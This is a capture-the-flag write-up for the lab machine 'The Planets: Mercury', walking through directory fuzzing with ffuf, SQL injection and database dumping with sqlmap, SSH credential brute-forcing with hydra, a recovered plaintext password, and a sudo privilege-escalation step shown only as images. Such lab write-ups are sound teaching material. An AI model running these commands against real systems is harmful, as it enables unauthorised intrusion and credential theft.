Last updated: 15 Apr 24 09:31:41 (UTC)

Write-Up Mercury

Mercury

By Lawcky 14/01/24

Introduction

The First of ‘The Planets’

Difficulty : easy

Additionnal info :

Name: The Planets: Mercury
Release date: 4 Sep 2020
Author: SirFlash
Series: The Planets

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • nmap
  • nikto
  • ffuf
  • sqlmap
  • hydra

Write-UP

FUZZING using ffuf

ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://192.168.1.72:8080/FUZZ -fc 403 -e .txt,.php,.html

nothing found not even in source code

Website

we found on the http://192.168.1.72:8080/mercuryfacts/ page
that there is 9 fact, while trying different things i found this

293b84cd76aab5a13a26b92d695e7b2a.png

these facts are given using SQL database

this seems to be the potential sql command executed

b696bbe8d879193f2973296cb58255de.png

1df1ff871c789bdf663ad855909e59cb.png
starting to get somewhere

using sqlmap

sqlmap -u http://192.168.1.72:8080/mercuryfacts/ --dbs --batch

d0d114d38af22aa5a0007ae705bb7f6c.png

sqlmap -u http://192.168.1.72:8080/mercuryfacts/ --dump --batch

20e889c5a2bcc12f4fb83e0804790184.png

we know have different users and password.

SSH

wordlist

17f19950a37dd2b4a1e9ab62d62619d6.png

using hydra for faster testing

hydra -C mercury_users 192.168.1.72 ssh

954075fa83a2fa5726940c003145e344.png

user webmaster is working

webmaster:mercuryisthesizeof0.056Earths

368c34531f6a75b9b5057f1b5660dc34.png

[user_flag_8339915c9a454657bd60ee58776f4ccd]

first flag found

Privilege Escalation

from webmaster to root

sudo version is vulnerable

sudo -V

df5a0e6722cbe6df7f24e6f031b49826.png

using this exploit

99521746feb8abb461f5eeb04e0d9899.png

fe543aa22f4140e5fd7d0654b61a9636.png
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
second flag found

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.